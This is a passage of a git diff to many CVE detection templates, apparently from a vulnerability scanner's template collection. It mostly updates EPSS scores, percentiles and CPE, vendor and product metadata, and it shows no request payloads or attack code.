@@ info: cve-id: CVE-2021-45428 cwe-id: CWE-639 epss-score: 0.08441 - epss-percentile: 0.9377 + epss-percentile: 0.9381 cpe: cpe:2.3:o:telesquare:tlr-2005ksh_firmware:-:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2021/CVE-2021-45967.yaml b/http/cves/2021/CVE-2021-45967.yaml index 04d5523c6b..b3a4e9ea97 100644 --- a/http/cves/2021/CVE-2021-45967.yaml +++ b/http/cves/2021/CVE-2021-45967.yaml @@ -20,11 +20,12 @@ info: cve-id: CVE-2021-45967 cwe-id: CWE-22 epss-score: 0.74039 - epss-percentile: 0.97823 - cpe: cpe:2.3:a:pascom_cloud_phone_system:*:*:*:*:*:*:*:*:* + epss-percentile: 0.97849 + cpe: cpe:2.3:a:pascom:cloud_phone_system:*:*:*:*:*:*:*:* metadata: max-request: 1 - vendor: pascom_cloud_phone_system + vendor: pascom + product: cloud_phone_system tags: cve,cve2021,pascom,ssrf,pascom_cloud_phone_system http: diff --git a/http/cves/2021/CVE-2021-45968.yaml b/http/cves/2021/CVE-2021-45968.yaml index 08b5567458..13bf8cc08c 100644 --- a/http/cves/2021/CVE-2021-45968.yaml +++ b/http/cves/2021/CVE-2021-45968.yaml @@ -22,7 +22,7 @@ info: cve-id: CVE-2021-45968 cwe-id: CWE-918 epss-score: 0.01877 - epss-percentile: 0.87082 + epss-percentile: 0.87134 cpe: cpe:2.3:a:jivesoftware:jive:-:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2021/CVE-2021-46005.yaml b/http/cves/2021/CVE-2021-46005.yaml index 785b44ce20..076a2b32a9 100644 --- a/http/cves/2021/CVE-2021-46005.yaml +++ b/http/cves/2021/CVE-2021-46005.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2021-46005 cwe-id: CWE-79 epss-score: 0.00143 - epss-percentile: 0.49949 + epss-percentile: 0.50055 cpe: cpe:2.3:a:car_rental_management_system_project:car_rental_management_system:1.0:*:*:*:*:*:*:* metadata: max-request: 3 diff --git a/http/cves/2021/CVE-2021-46068.yaml b/http/cves/2021/CVE-2021-46068.yaml index 621884fc2f..9ae8c012eb 100644 --- a/http/cves/2021/CVE-2021-46068.yaml +++ b/http/cves/2021/CVE-2021-46068.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2021-46068 cwe-id: CWE-79 epss-score: 0.00084 - epss-percentile: 0.34889 + epss-percentile: 0.34831 cpe: cpe:2.3:a:vehicle_service_management_system_project:vehicle_service_management_system:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2021/CVE-2021-46069.yaml b/http/cves/2021/CVE-2021-46069.yaml index db1c5bb8ab..f213951b4d 100644 --- a/http/cves/2021/CVE-2021-46069.yaml +++ b/http/cves/2021/CVE-2021-46069.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2021-46069 cwe-id: CWE-79 epss-score: 0.00084 - epss-percentile: 0.34889 + epss-percentile: 0.34831 cpe: cpe:2.3:a:vehicle_service_management_system_project:vehicle_service_management_system:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2021/CVE-2021-46071.yaml b/http/cves/2021/CVE-2021-46071.yaml index cde09f75c2..1a64178ced 100644 --- a/http/cves/2021/CVE-2021-46071.yaml +++ b/http/cves/2021/CVE-2021-46071.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2021-46071 cwe-id: CWE-79 epss-score: 0.00084 - epss-percentile: 0.34889 + epss-percentile: 0.34831 cpe: cpe:2.3:a:vehicle_service_management_system_project:vehicle_service_management_system:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2021/CVE-2021-46072.yaml b/http/cves/2021/CVE-2021-46072.yaml index e38ccfa7eb..0508b569e7 100644 --- a/http/cves/2021/CVE-2021-46072.yaml +++ b/http/cves/2021/CVE-2021-46072.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2021-46072 cwe-id: CWE-79 epss-score: 0.00084 - epss-percentile: 0.34889 + epss-percentile: 0.34831 cpe: cpe:2.3:a:vehicle_service_management_system_project:vehicle_service_management_system:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2021/CVE-2021-46073.yaml b/http/cves/2021/CVE-2021-46073.yaml index 0555f15927..ff63912ff1 100644 --- a/http/cves/2021/CVE-2021-46073.yaml +++ b/http/cves/2021/CVE-2021-46073.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2021-46073 cwe-id: CWE-79 epss-score: 0.00084 - epss-percentile: 0.34889 + epss-percentile: 0.34831 cpe: cpe:2.3:a:vehicle_service_management_system_project:vehicle_service_management_system:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2021/CVE-2021-46107.yaml b/http/cves/2021/CVE-2021-46107.yaml index b72dcbed17..d56ae9464c 100644 --- a/http/cves/2021/CVE-2021-46107.yaml +++ b/http/cves/2021/CVE-2021-46107.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2021-46107 cwe-id: CWE-918 epss-score: 0.01739 - epss-percentile: 0.86503 + epss-percentile: 0.86557 cpe: cpe:2.3:a:ligeo-archives:ligeo_basics:02_01-2022:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2021/CVE-2021-46379.yaml b/http/cves/2021/CVE-2021-46379.yaml index 8cd466491a..cde7030be6 100644 --- a/http/cves/2021/CVE-2021-46379.yaml +++ b/http/cves/2021/CVE-2021-46379.yaml @@ -19,8 +19,8 @@ info: cvss-score: 6.1 cve-id: CVE-2021-46379 cwe-id: CWE-601 - epss-score: 0.00245 - epss-percentile: 0.62342 + epss-score: 0.00267 + epss-percentile: 0.64198 cpe: cpe:2.3:o:dlink:dir-850l_firmware:1.08trb03:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2021/CVE-2021-46381.yaml b/http/cves/2021/CVE-2021-46381.yaml index b8ea4ff65f..956196f33f 100644 --- a/http/cves/2021/CVE-2021-46381.yaml +++ b/http/cves/2021/CVE-2021-46381.yaml @@ -19,8 +19,8 @@ info: cvss-score: 7.5 cve-id: CVE-2021-46381 cwe-id: CWE-22 - epss-score: 0.01734 - epss-percentile: 0.86483 + epss-score: 0.02202 + epss-percentile: 0.88284 cpe: cpe:2.3:o:dlink:dap-1620_firmware:-:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2021/CVE-2021-46387.yaml b/http/cves/2021/CVE-2021-46387.yaml index de652fe759..b85f72f808 100644 --- a/http/cves/2021/CVE-2021-46387.yaml +++ b/http/cves/2021/CVE-2021-46387.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2021-46387 cwe-id: CWE-79 epss-score: 0.00628 - epss-percentile: 0.76632 + epss-percentile: 0.76726 cpe: cpe:2.3:o:zyxel:zywall_2_plus_internet_security_appliance_firmware:-:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2021/CVE-2021-46417.yaml b/http/cves/2021/CVE-2021-46417.yaml index 911ef91c61..0ded2873ff 100644 --- a/http/cves/2021/CVE-2021-46417.yaml +++ b/http/cves/2021/CVE-2021-46417.yaml @@ -20,8 +20,8 @@ info: cvss-score: 7.5 cve-id: CVE-2021-46417 cwe-id: CWE-22 - epss-score: 0.66274 - epss-percentile: 0.97607 + epss-score: 0.67544 + epss-percentile: 0.9766 cpe: cpe:2.3:o:franklinfueling:colibri_firmware:1.8.19.8580:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2021/CVE-2021-46422.yaml b/http/cves/2021/CVE-2021-46422.yaml index 2c26d97401..9ae3a1aa3f 100644 --- a/http/cves/2021/CVE-2021-46422.yaml +++ b/http/cves/2021/CVE-2021-46422.yaml @@ -21,8 +21,8 @@ info: cvss-score: 9.8 cve-id: CVE-2021-46422 cwe-id: CWE-78 - epss-score: 0.94969 - epss-percentile: 0.99104 + epss-score: 0.95223 + epss-percentile: 0.99177 cpe: cpe:2.3:o:telesquare:sdt-cs3b1_firmware:1.1.0:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2021/CVE-2021-46424.yaml b/http/cves/2021/CVE-2021-46424.yaml index a70cb01db2..ab2a90a50d 100644 --- a/http/cves/2021/CVE-2021-46424.yaml +++ b/http/cves/2021/CVE-2021-46424.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2021-46424 cwe-id: CWE-306 epss-score: 0.0159 - epss-percentile: 0.85917 + epss-percentile: 0.85955 cpe: cpe:2.3:o:telesquare:tlr-2005ksh_firmware:1.0.0:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2021/CVE-2021-46704.yaml b/http/cves/2021/CVE-2021-46704.yaml index c3fefa7f23..3e46100b07 100644 --- a/http/cves/2021/CVE-2021-46704.yaml +++ b/http/cves/2021/CVE-2021-46704.yaml @@ -21,8 +21,8 @@ info: cvss-score: 9.8 cve-id: CVE-2021-46704 cwe-id: CWE-78 - epss-score: 0.95016 - epss-percentile: 0.99114 + epss-score: 0.95193 + epss-percentile: 0.9917 cpe: cpe:2.3:a:genieacs:genieacs:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-0087.yaml b/http/cves/2022/CVE-2022-0087.yaml index 4ad76d5375..aba09bd573 100644 --- a/http/cves/2022/CVE-2022-0087.yaml +++ b/http/cves/2022/CVE-2022-0087.yaml @@ -11,6 +11,15 @@ info: reference: - https://huntr.com/bounties/c9d7374f-2cb9-4bac-9c90-a965942f413e - https://nvd.nist.gov/vuln/detail/CVE-2022-0087 + - https://github.com/keystonejs/keystone/commit/96bf833a23b1a0a5d365cf394467a943cc481b38 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2022-0087 + cwe-id: CWE-79 + epss-score: 0.001 + epss-percentile: 0.40832 + cpe: cpe:2.3:a:keystonejs:keystone:*:*:*:*:*:node.js:*:* metadata: max-request: 2 vendor: keystonejs diff --git a/http/cves/2022/CVE-2022-0140.yaml b/http/cves/2022/CVE-2022-0140.yaml index 9b7da91a37..bbeff6620f 100644 --- a/http/cves/2022/CVE-2022-0140.yaml +++ b/http/cves/2022/CVE-2022-0140.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2022-0140 cwe-id: CWE-306 epss-score: 0.00966 - epss-percentile: 0.81532 + epss-percentile: 0.81608 cpe: cpe:2.3:a:vfbpro:visual_form_builder:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 diff --git a/http/cves/2022/CVE-2022-0147.yaml b/http/cves/2022/CVE-2022-0147.yaml index a163b95d95..bec3f90c54 100644 --- a/http/cves/2022/CVE-2022-0147.yaml +++ b/http/cves/2022/CVE-2022-0147.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2022-0147 cwe-id: CWE-79 epss-score: 0.001 - epss-percentile: 0.40761 + epss-percentile: 0.40832 cpe: cpe:2.3:a:cookieinformation:wp-gdpr-compliance:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-0148.yaml b/http/cves/2022/CVE-2022-0148.yaml index d243bf4c73..671f366a5a 100644 --- a/http/cves/2022/CVE-2022-0148.yaml +++ b/http/cves/2022/CVE-2022-0148.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2022-0148 cwe-id: CWE-79 epss-score: 0.00144 - epss-percentile: 0.50048 + epss-percentile: 0.50156 cpe: cpe:2.3:a:premio:mystickyelements:*:*:*:*:*:wordpress:*:* metadata: max-request: 2 diff --git a/http/cves/2022/CVE-2022-0149.yaml b/http/cves/2022/CVE-2022-0149.yaml index b0ab05e2d3..8eaed894af 100644 --- a/http/cves/2022/CVE-2022-0149.yaml +++ b/http/cves/2022/CVE-2022-0149.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2022-0149 cwe-id: CWE-79 epss-score: 0.001 - epss-percentile: 0.40761 + epss-percentile: 0.40832 cpe: cpe:2.3:a:visser:store_exporter_for_woocommerce:*:*:*:*:*:wordpress:*:* metadata: max-request: 2 diff --git a/http/cves/2022/CVE-2022-0150.yaml b/http/cves/2022/CVE-2022-0150.yaml index 7966869e6f..2025ed39c2 100644 --- a/http/cves/2022/CVE-2022-0150.yaml +++ b/http/cves/2022/CVE-2022-0150.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2022-0150 cwe-id: CWE-79 epss-score: 0.001 - epss-percentile: 0.40761 + epss-percentile: 0.40832 cpe: cpe:2.3:a:wp_accessibility_helper_project:wp_accessibility_helper:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 diff --git a/http/cves/2022/CVE-2022-0165.yaml b/http/cves/2022/CVE-2022-0165.yaml index b3eda5ba0b..66abbf3624 100644 --- a/http/cves/2022/CVE-2022-0165.yaml +++ b/http/cves/2022/CVE-2022-0165.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2022-0165 cwe-id: CWE-601 epss-score: 0.001 - epss-percentile: 0.40768 + epss-percentile: 0.40839 cpe: cpe:2.3:a:king-theme:kingcomposer:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 diff --git a/http/cves/2022/CVE-2022-0169.yaml b/http/cves/2022/CVE-2022-0169.yaml index 0065f55318..6aa4050640 100644 --- a/http/cves/2022/CVE-2022-0169.yaml +++ b/http/cves/2022/CVE-2022-0169.yaml @@ -19,8 +19,8 @@ info: cvss-score: 9.8 cve-id: CVE-2022-0169 cwe-id: CWE-89 - epss-score: 0.01295 - epss-percentile: 0.84273 + epss-score: 0.01573 + epss-percentile: 0.85892 cpe: cpe:2.3:a:10web:photo_gallery:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-0189.yaml b/http/cves/2022/CVE-2022-0189.yaml index bd2e59137e..b7459c5344 100644 --- a/http/cves/2022/CVE-2022-0189.yaml +++ b/http/cves/2022/CVE-2022-0189.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2022-0189 cwe-id: CWE-79 epss-score: 0.001 - epss-percentile: 0.40761 + epss-percentile: 0.40832 cpe: cpe:2.3:a:wprssaggregator:wp_rss_aggregator:*:*:*:*:*:wordpress:*:* metadata: max-request: 2 diff --git a/http/cves/2022/CVE-2022-0201.yaml b/http/cves/2022/CVE-2022-0201.yaml index 6bd6d91628..7e7a5be88a 100644 --- a/http/cves/2022/CVE-2022-0201.yaml +++ b/http/cves/2022/CVE-2022-0201.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2022-0201 cwe-id: CWE-79 epss-score: 0.001 - epss-percentile: 0.40761 + epss-percentile: 0.40832 cpe: cpe:2.3:a:permalink_manager_lite_project:permalink_manager_lite:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 diff --git a/http/cves/2022/CVE-2022-0206.yaml b/http/cves/2022/CVE-2022-0206.yaml index 528330ec2c..a0311c7fe8 100644 --- a/http/cves/2022/CVE-2022-0206.yaml +++ b/http/cves/2022/CVE-2022-0206.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2022-0206 cwe-id: CWE-79 epss-score: 0.00106 - epss-percentile: 0.42757 + epss-percentile: 0.42838 cpe: cpe:2.3:a:newstatpress_project:newstatpress:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-0208.yaml b/http/cves/2022/CVE-2022-0208.yaml index 4adbefebf5..548bac8829 100644 --- a/http/cves/2022/CVE-2022-0208.yaml +++ b/http/cves/2022/CVE-2022-0208.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2022-0208 cwe-id: CWE-79 epss-score: 0.00106 - epss-percentile: 0.42757 + epss-percentile: 0.42838 cpe: cpe:2.3:a:mappresspro:mappress:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 diff --git a/http/cves/2022/CVE-2022-0212.yaml b/http/cves/2022/CVE-2022-0212.yaml index e5262830b6..7b4f024e2d 100644 --- a/http/cves/2022/CVE-2022-0212.yaml +++ b/http/cves/2022/CVE-2022-0212.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2022-0212 cwe-id: CWE-79 epss-score: 0.00086 - epss-percentile: 0.35822 + epss-percentile: 0.35806 cpe: cpe:2.3:a:10web:spidercalendar:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-0218.yaml b/http/cves/2022/CVE-2022-0218.yaml index 028fa3ad8a..4efef10492 100644 --- a/http/cves/2022/CVE-2022-0218.yaml +++ b/http/cves/2022/CVE-2022-0218.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2022-0218 cwe-id: CWE-79 epss-score: 0.03872 - epss-percentile: 0.90976 + epss-percentile: 0.91041 cpe: cpe:2.3:a:codemiq:wordpress_email_template_designer:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 diff --git a/http/cves/2022/CVE-2022-0220.yaml b/http/cves/2022/CVE-2022-0220.yaml index 4a20579f8d..d1ab676e42 100644 --- a/http/cves/2022/CVE-2022-0220.yaml +++ b/http/cves/2022/CVE-2022-0220.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2022-0220 cwe-id: CWE-116 epss-score: 0.00124 - epss-percentile: 0.4652 + epss-percentile: 0.46641 cpe: cpe:2.3:a:welaunch:wordpress_gdpr\&ccpa:*:*:*:*:*:wordpress:*:* metadata: max-request: 2 diff --git a/http/cves/2022/CVE-2022-0228.yaml b/http/cves/2022/CVE-2022-0228.yaml index 0520ae68d9..c893f181eb 100644 --- a/http/cves/2022/CVE-2022-0228.yaml +++ b/http/cves/2022/CVE-2022-0228.yaml @@ -16,8 +16,8 @@ info: cvss-score: 7.2 cve-id: CVE-2022-0228 cwe-id: CWE-89 - epss-score: 0.03851 - epss-percentile: 0.90952 + epss-score: 0.03432 + epss-percentile: 0.90525 cpe: cpe:2.3:a:sygnoos:popup_builder:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-0234.yaml b/http/cves/2022/CVE-2022-0234.yaml index a1aad89cbb..0927da20d6 100644 --- a/http/cves/2022/CVE-2022-0234.yaml +++ b/http/cves/2022/CVE-2022-0234.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2022-0234 cwe-id: CWE-79 epss-score: 0.001 - epss-percentile: 0.40761 + epss-percentile: 0.40832 cpe: cpe:2.3:a:pluginus:woocs:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-0271.yaml b/http/cves/2022/CVE-2022-0271.yaml index 3923274547..09516aa4a2 100644 --- a/http/cves/2022/CVE-2022-0271.yaml +++ b/http/cves/2022/CVE-2022-0271.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2022-0271 cwe-id: CWE-79 epss-score: 0.00106 - epss-percentile: 0.42757 + epss-percentile: 0.42838 cpe: cpe:2.3:a:thimpress:learnpress:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 diff --git a/http/cves/2022/CVE-2022-0281.yaml b/http/cves/2022/CVE-2022-0281.yaml index 1fda2556c5..3e69123ca0 100644 --- a/http/cves/2022/CVE-2022-0281.yaml +++ b/http/cves/2022/CVE-2022-0281.yaml @@ -18,8 +18,8 @@ info: cvss-score: 7.5 cve-id: CVE-2022-0281 cwe-id: CWE-200 - epss-score: 0.0051 - epss-percentile: 0.73907 + epss-score: 0.0049 + epss-percentile: 0.73538 cpe: cpe:2.3:a:microweber:microweber:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2022/CVE-2022-0288.yaml b/http/cves/2022/CVE-2022-0288.yaml index 46fb756868..15024f77d0 100644 --- a/http/cves/2022/CVE-2022-0288.yaml +++ b/http/cves/2022/CVE-2022-0288.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2022-0288 cwe-id: CWE-79 epss-score: 0.00106 - epss-percentile: 0.42757 + epss-percentile: 0.42838 cpe: cpe:2.3:a:ad_inserter_pro_project:ad_inserter_pro:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 diff --git a/http/cves/2022/CVE-2022-0342.yaml b/http/cves/2022/CVE-2022-0342.yaml index 76953b11a3..75c24b7d11 100644 --- a/http/cves/2022/CVE-2022-0342.yaml +++ b/http/cves/2022/CVE-2022-0342.yaml @@ -16,7 +16,7 @@ info: cve-id: CVE-2022-0342 cwe-id: CWE-287 epss-score: 0.07467 - epss-percentile: 0.93409 + epss-percentile: 0.93455 cpe: cpe:2.3:o:zyxel:usg40_firmware:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-0346.yaml b/http/cves/2022/CVE-2022-0346.yaml index 833adb9f4c..d994f64efe 100644 --- a/http/cves/2022/CVE-2022-0346.yaml +++ b/http/cves/2022/CVE-2022-0346.yaml @@ -19,8 +19,8 @@ info: cvss-score: 6.1 cve-id: CVE-2022-0346 cwe-id: CWE-79 - epss-score: 0.00101 - epss-percentile: 0.40919 + epss-score: 0.00088 + epss-percentile: 0.36947 cpe: cpe:2.3:a:xmlsitemapgenerator:xml_sitemap_generator:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-0349.yaml b/http/cves/2022/CVE-2022-0349.yaml index bd3cb56508..c2c4afb856 100644 --- a/http/cves/2022/CVE-2022-0349.yaml +++ b/http/cves/2022/CVE-2022-0349.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2022-0349 cwe-id: CWE-89 epss-score: 0.03383 - epss-percentile: 0.90397 + epss-percentile: 0.90457 cpe: cpe:2.3:a:wpdeveloper:notificationx:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-0378.yaml b/http/cves/2022/CVE-2022-0378.yaml index dd221379d4..46d0c91757 100644 --- a/http/cves/2022/CVE-2022-0378.yaml +++ b/http/cves/2022/CVE-2022-0378.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2022-0378 cwe-id: CWE-79 epss-score: 0.001 - epss-percentile: 0.40761 + epss-percentile: 0.40832 cpe: cpe:2.3:a:microweber:microweber:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2022/CVE-2022-0381.yaml b/http/cves/2022/CVE-2022-0381.yaml index 2d6e584331..efed967bf7 100644 --- a/http/cves/2022/CVE-2022-0381.yaml +++ b/http/cves/2022/CVE-2022-0381.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2022-0381 cwe-id: CWE-79 epss-score: 0.00218 - epss-percentile: 0.59581 + epss-percentile: 0.59748 cpe: cpe:2.3:a:embed_swagger_project:embed_swagger:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 diff --git a/http/cves/2022/CVE-2022-0412.yaml b/http/cves/2022/CVE-2022-0412.yaml index 644ce51ad0..29ce232016 100644 --- a/http/cves/2022/CVE-2022-0412.yaml +++ b/http/cves/2022/CVE-2022-0412.yaml @@ -20,8 +20,8 @@ info: cvss-score: 9.8 cve-id: CVE-2022-0412 cwe-id: CWE-89 - epss-score: 0.11521 - epss-percentile: 0.9469 + epss-score: 0.08257 + epss-percentile: 0.93752 cpe: cpe:2.3:a:templateinvaders:ti_woocommerce_wishlist:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-0415.yaml b/http/cves/2022/CVE-2022-0415.yaml index d8feb8c22d..2f8e20c18a 100644 --- a/http/cves/2022/CVE-2022-0415.yaml +++ b/http/cves/2022/CVE-2022-0415.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2022-0415 cwe-id: CWE-434,CWE-20 epss-score: 0.1488 - epss-percentile: 0.95255 + epss-percentile: 0.95273 cpe: cpe:2.3:a:gogs:gogs:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-0422.yaml b/http/cves/2022/CVE-2022-0422.yaml index 1aa3e42d11..f9a3e7d92b 100644 --- a/http/cves/2022/CVE-2022-0422.yaml +++ b/http/cves/2022/CVE-2022-0422.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2022-0422 cwe-id: CWE-79 epss-score: 0.001 - epss-percentile: 0.40761 + epss-percentile: 0.40832 cpe: cpe:2.3:a:videousermanuals:white_label_cms:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 diff --git a/http/cves/2022/CVE-2022-0432.yaml b/http/cves/2022/CVE-2022-0432.yaml index 47283565d7..f0bd281172 100644 --- a/http/cves/2022/CVE-2022-0432.yaml +++ b/http/cves/2022/CVE-2022-0432.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2022-0432 cwe-id: CWE-1321 epss-score: 0.001 - epss-percentile: 0.40761 + epss-percentile: 0.40832 cpe: cpe:2.3:a:joinmastodon:mastodon:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2022/CVE-2022-0434.yaml b/http/cves/2022/CVE-2022-0434.yaml index c44d97fb89..ae717a3380 100644 --- a/http/cves/2022/CVE-2022-0434.yaml +++ b/http/cves/2022/CVE-2022-0434.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2022-0434 cwe-id: CWE-89 epss-score: 0.03633 - epss-percentile: 0.90687 + epss-percentile: 0.90761 cpe: cpe:2.3:a:a3rev:page_view_count:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-0437.yaml b/http/cves/2022/CVE-2022-0437.yaml index 7384eb2b69..102c6bbdaf 100644 --- a/http/cves/2022/CVE-2022-0437.yaml +++ b/http/cves/2022/CVE-2022-0437.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2022-0437 cwe-id: CWE-79 epss-score: 0.001 - epss-percentile: 0.40761 + epss-percentile: 0.40832 cpe: cpe:2.3:a:karma_project:karma:*:*:*:*:*:node.js:*:* metadata: max-request: 2 diff --git a/http/cves/2022/CVE-2022-0441.yaml b/http/cves/2022/CVE-2022-0441.yaml index 2119fd14bb..6e849c641c 100644 --- a/http/cves/2022/CVE-2022-0441.yaml +++ b/http/cves/2022/CVE-2022-0441.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2022-0441 cwe-id: CWE-269,NVD-CWE-Other epss-score: 0.18749 - epss-percentile: 0.9573 + epss-percentile: 0.95773 cpe: cpe:2.3:a:stylemixthemes:masterstudy_lms:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-0482.yaml b/http/cves/2022/CVE-2022-0482.yaml index ebea23fbd2..e1f5cf109e 100644 --- a/http/cves/2022/CVE-2022-0482.yaml +++ b/http/cves/2022/CVE-2022-0482.yaml @@ -21,8 +21,8 @@ info: cvss-score: 9.1 cve-id: CVE-2022-0482 cwe-id: CWE-359,CWE-863 - epss-score: 0.0342 - epss-percentile: 0.90441 + epss-score: 0.04316 + epss-percentile: 0.91459 cpe: cpe:2.3:a:easyappointments:easyappointments:*:*:*:*:*:wordpress:*:* metadata: max-request: 2 diff --git a/http/cves/2022/CVE-2022-0533.yaml b/http/cves/2022/CVE-2022-0533.yaml index 29c379d9e2..12f4fd8140 100644 --- a/http/cves/2022/CVE-2022-0533.yaml +++ b/http/cves/2022/CVE-2022-0533.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2022-0533 cwe-id: CWE-79 epss-score: 0.001 - epss-percentile: 0.40761 + epss-percentile: 0.40832 cpe: cpe:2.3:a:metaphorcreations:ditty:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-0535.yaml b/http/cves/2022/CVE-2022-0535.yaml index 18c28cdf3a..f346e92f67 100644 --- a/http/cves/2022/CVE-2022-0535.yaml +++ b/http/cves/2022/CVE-2022-0535.yaml @@ -22,7 +22,7 @@ info: cve-id: CVE-2022-0535 cwe-id: CWE-79 epss-score: 0.00084 - epss-percentile: 0.34879 + epss-percentile: 0.34822 cpe: cpe:2.3:a:e2pdf:e2pdf:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-0540.yaml b/http/cves/2022/CVE-2022-0540.yaml index 908540ea05..944847a670 100644 --- a/http/cves/2022/CVE-2022-0540.yaml +++ b/http/cves/2022/CVE-2022-0540.yaml @@ -20,8 +20,8 @@ info: cvss-score: 9.8 cve-id: CVE-2022-0540 cwe-id: CWE-287 - epss-score: 0.158 - epss-percentile: 0.95401 + epss-score: 0.20963 + epss-percentile: 0.95969 cpe: cpe:2.3:a:atlassian:jira_data_center:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2022/CVE-2022-0591.yaml b/http/cves/2022/CVE-2022-0591.yaml index a213516107..5fd00a75c0 100644 --- a/http/cves/2022/CVE-2022-0591.yaml +++ b/http/cves/2022/CVE-2022-0591.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2022-0591 cwe-id: CWE-918 epss-score: 0.03628 - epss-percentile: 0.90682 + epss-percentile: 0.90752 cpe: cpe:2.3:a:subtlewebinc:formcraft3:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-0594.yaml b/http/cves/2022/CVE-2022-0594.yaml index cf5568bef6..e04e5428ee 100644 --- a/http/cves/2022/CVE-2022-0594.yaml +++ b/http/cves/2022/CVE-2022-0594.yaml @@ -19,8 +19,8 @@ info: cvss-score: 5.3 cve-id: CVE-2022-0594 cwe-id: CWE-863 - epss-score: 0.00279 - epss-percentile: 0.64826 + epss-score: 0.0025 + epss-percentile: 0.62934 cpe: cpe:2.3:a:shareaholic:shareaholic:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-0595.yaml b/http/cves/2022/CVE-2022-0595.yaml index da15df9dca..e950567e4e 100644 --- a/http/cves/2022/CVE-2022-0595.yaml +++ b/http/cves/2022/CVE-2022-0595.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2022-0595 